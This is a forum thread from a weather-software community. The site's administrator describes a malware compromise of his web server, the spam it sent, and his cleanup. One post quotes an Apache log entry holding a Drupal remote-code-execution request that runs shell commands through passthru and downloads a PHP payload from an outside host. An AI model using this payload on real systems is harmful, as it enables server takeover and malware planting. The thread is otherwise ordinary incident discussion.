IMPORTANT! The server may go down soon - possibly permanently. Please read the latest post in Announcements and News

I strongly advise all users using my server for their web site to make alternative arrangements.

Outgoing mail is disabled because of the malware on the server. No new forum registrations are currently possible, and mail to the forum administrator will not work.

Please read the posts in the Announcements section about the current status of Cumulus development now that I have retired

Please read this post before posting

Latest Cumulus release v1.9.4 (build 1099) - Nov 28 2014
Latest Cumulus MX release - v3.0.0 build 3043 Jan 20 2017. See this post for download

Site going down.

Talk about anything that doesn't fit elsewhere - PLEASE don't put Cumulus queries in here!
User avatar
Toxic17
Posts: 698
Joined: Mon May 19, 2014 10:45 pm
Weather Station: Davis VPro2 Plus
Operating System: Debian 9.5 Stretch
Location: Bangor, NI
Contact:

Re: Site going down.

Postby Toxic17 » Tue Oct 09, 2018 8:19 pm

Lets hope you've fixed it so you and the wife can get on with the holiday.
Regards Simon

https://www.conligwx.org
https://www.conligwx.org/pws/
https://twitter.com/conligwx
Davis Vantage Pro2+ - CumulusMX v3.0.0 (build 3043) + Saratoga/PWS
Image

Matt.j5b
Posts: 430
Joined: Mon Nov 28, 2011 2:13 am
Weather Station: Davis VP2 and La Crosse WS 2306
Operating System: Windows 10 64 Bit
Location: Ferny Grove, Brisbane, Australia
Contact:

Re: Site going down.

Postby Matt.j5b » Tue Oct 09, 2018 8:36 pm

It's good to hear you have been making progress and thanks for trying to resolve this. It's a horrible shame how low some people are in what they do to cause trouble. Hopefully you have fixed the issue and you do enjoy your holiday. :)
Regards, Matt of Brisbane, Australia
Ferny Grove Weather
Cumulus MX testing

jlmr731
Posts: 118
Joined: Sat Aug 27, 2016 12:11 am
Weather Station: Davis vantage pro 2
Operating System: Debian
Location: Youngstown, Ohio
Contact:

Re: Site going down.

Postby jlmr731 » Wed Oct 10, 2018 2:19 am

Any chance that you can give us a little insight on the script they used to keep it running, or what one should look for.
May be helpful for other's to know what to do if they have this problem to stop these script kiddies.

Thanks Steve for your hard work getting this problem resolved while on holiday.

User avatar
steve
Cumulus Author
Posts: 26697
Joined: Mon Jun 02, 2008 6:49 pm
Weather Station: None
Operating System: None
Location: Vienne, France
Contact:

Re: Site going down.

Postby steve » Wed Oct 10, 2018 2:58 pm

I don't really have much to offer, I just deleted installations of things like Wordpress and Drupal which hadn't been kept up to date. This entry (and others similar) in the apache log looked suspicious (thanks go to Ken for suggesting that a suspicious POST was something to look for) and from googling it appeared to be related to a Drupal vulnerability;

85.126.200.23 - - [08/Oct/2018:04:43:19 +0200] "POST //?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=mv+sites/default/.htaccess+htaccessx;curl+-o+sites/default/api.php+'http://saint-laurent-gorre.fr/_inc/_phpThumb/demit.aff' HTTP/1.1" 200 8120 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/51.0.2704.79 Chrome/51.0.2704.79 Safari/537.36"

I realised that I had been wrong about the spam not coming from the server when I had turned off all the legitimate sources of email and there were still smtp connections being made. I also had a number of (supposedly) exim processes running, and I don't have exim installed. Some malware disguises itself as exim, amongst other things.

It makes you realise that Linux is no more secure than Windows unless you really know what you're doing and keep on top of vulnerability notices and keep everything up to date. Although I believe this incident was my fault for not keeping things up to date, I do now regret allowing some users to install things like PHPBB and Wordpress.
Steve
-----
Hosting available for Cumulus web sites. See http://sandaysoft.com/forum/viewtopic.php?f=2&t=11876

Please read the posts in the Announcements section about the current status of Cumulus development since I have retired from my day job

RayProudfoot
Posts: 2585
Joined: Wed May 06, 2009 6:29 pm
Weather Station: Davis VP2 with Daytime FARS
Operating System: Windows XP SP3
Location: Cheadle Hulme, Cheshire, England
Contact:

Re: Site going down.

Postby RayProudfoot » Wed Oct 10, 2018 4:05 pm

Steve, thanks for the update. Way over my head I’m afraid. Does this now mean the malware is no more and the hosting company have removed the threat of closure?
Cheers,
Ray, Cheshire.

Image

User avatar
steve
Cumulus Author
Posts: 26697
Joined: Mon Jun 02, 2008 6:49 pm
Weather Station: None
Operating System: None
Location: Vienne, France
Contact:

Re: Site going down.

Postby steve » Wed Oct 10, 2018 4:54 pm

I believe the malware is no more, although there is still a slight oddity to be explained, but this apparently is not doing any harm. Hetzner are going to review after two days. After which I will re-enable the outgoing smtp port so that mail from the forum will start working again, and hopefully the server will eventually stop being flagged as a risk - I’ve noticed in the mail logs that some destinations are refusing mail from us.
Steve
-----
Hosting available for Cumulus web sites. See http://sandaysoft.com/forum/viewtopic.php?f=2&t=11876

Please read the posts in the Announcements section about the current status of Cumulus development since I have retired from my day job

RayProudfoot
Posts: 2585
Joined: Wed May 06, 2009 6:29 pm
Weather Station: Davis VP2 with Daytime FARS
Operating System: Windows XP SP3
Location: Cheadle Hulme, Cheshire, England
Contact:

Re: Site going down.

Postby RayProudfoot » Wed Oct 10, 2018 9:54 pm

Thanks Steve. I’m breathing a huge sigh of relief. Things looked very bleak over the weekend but you’ve done a great job in sorting things out aided by Ken. :clap:
Cheers,
Ray, Cheshire.

Image

User avatar
hornychz
Posts: 7
Joined: Mon May 11, 2015 3:54 pm
Weather Station: WeatherDuino Pro2
Operating System: Raspbian Wheezy
Location: Brandys nad Labem - Stara Boleslav, Czech republic
Contact:

Re: Site going down.

Postby hornychz » Thu Oct 11, 2018 8:11 am

:clap: :)

User avatar
Toxic17
Posts: 698
Joined: Mon May 19, 2014 10:45 pm
Weather Station: Davis VPro2 Plus
Operating System: Debian 9.5 Stretch
Location: Bangor, NI
Contact:

Re: Site going down.

Postby Toxic17 » Thu Oct 11, 2018 11:34 am

It sounds like more a php injection vulnerability than linux itself being hacked. php CMS's are plagued with security holes and by only updating them when updates are released can you try to secure a site.

Steve, on that note you would be advised to update phpBB. your running a version that needs updated ;)

pm sent...
Regards Simon

https://www.conligwx.org
https://www.conligwx.org/pws/
https://twitter.com/conligwx
Davis Vantage Pro2+ - CumulusMX v3.0.0 (build 3043) + Saratoga/PWS
Image

RayProudfoot
Posts: 2585
Joined: Wed May 06, 2009 6:29 pm
Weather Station: Davis VP2 with Daytime FARS
Operating System: Windows XP SP3
Location: Cheadle Hulme, Cheshire, England
Contact:

Re: Site going down.

Postby RayProudfoot » Thu Oct 11, 2018 12:00 pm

Not sure if this related or not but when I log into my account with FileZilla it notifies me the certificate has expired. Is that a potential area of concern?
Cheers,
Ray, Cheshire.

Image

User avatar
steve
Cumulus Author
Posts: 26697
Joined: Mon Jun 02, 2008 6:49 pm
Weather Station: None
Operating System: None
Location: Vienne, France
Contact:

Re: Site going down.

Postby steve » Thu Oct 11, 2018 1:05 pm

I created a dummy certificate when I enabled secure ftp on the server when testing the code I added to Cumulus MX. Filezilla will try to use secure ftp in preference and will get the dummy certificate. I suppose I should really disable secure ftp on the server, I get asked about this regularly. The last time I was asked, I forgot how it was supposed to work, and broke the server for a short time trying to fix something that didn’t need fixing!

At some point I may look into getting a proper certificate, now that they can be had for free.

(Short answer: no :) )
Steve
-----
Hosting available for Cumulus web sites. See http://sandaysoft.com/forum/viewtopic.php?f=2&t=11876

Please read the posts in the Announcements section about the current status of Cumulus development since I have retired from my day job

RayProudfoot
Posts: 2585
Joined: Wed May 06, 2009 6:29 pm
Weather Station: Davis VP2 with Daytime FARS
Operating System: Windows XP SP3
Location: Cheadle Hulme, Cheshire, England
Contact:

Re: Site going down.

Postby RayProudfoot » Thu Oct 11, 2018 3:45 pm

Thanks Steve. Not a major issue for me but given recent events thought it worth asking. I imagine you're feeling a lot better now! Time for a beer or two! :D
Cheers,
Ray, Cheshire.

Image

User avatar
steve
Cumulus Author
Posts: 26697
Joined: Mon Jun 02, 2008 6:49 pm
Weather Station: None
Operating System: None
Location: Vienne, France
Contact:

Re: Site going down.

Postby steve » Mon Oct 15, 2018 2:41 pm

The spam has started again. I have blocked outgoing traffic on port 25 and will investigate when I get home, I've had enough of this for now.

I strongly advise anyone whose web site is on this server to start making alternative arrangements. I will refund any payments made, pro-rata, on request to steve@nybbles.co.uk
Steve
-----
Hosting available for Cumulus web sites. See http://sandaysoft.com/forum/viewtopic.php?f=2&t=11876

Please read the posts in the Announcements section about the current status of Cumulus development since I have retired from my day job

User avatar
saratogaWX
Posts: 896
Joined: Wed May 06, 2009 5:02 am
Weather Station: Davis Vantage Pro Plus
Operating System: Windows XP SP3
Location: Saratoga, CA, USA
Contact:

Re: Site going down.

Postby saratogaWX » Mon Oct 15, 2018 4:21 pm

Ouch. I’ll be glad to analyze the logs again, Steve.

Best regards,
Ken

User avatar
steve
Cumulus Author
Posts: 26697
Joined: Mon Jun 02, 2008 6:49 pm
Weather Station: None
Operating System: None
Location: Vienne, France
Contact:

Re: Site going down.

Postby steve » Mon Oct 15, 2018 4:29 pm

Thanks, Ken, when I get chance I’ll zip them up for you.
Steve
-----
Hosting available for Cumulus web sites. See http://sandaysoft.com/forum/viewtopic.php?f=2&t=11876

Please read the posts in the Announcements section about the current status of Cumulus development since I have retired from my day job


Return to “General”

Who is online

Users browsing this forum: No registered users and 6 guests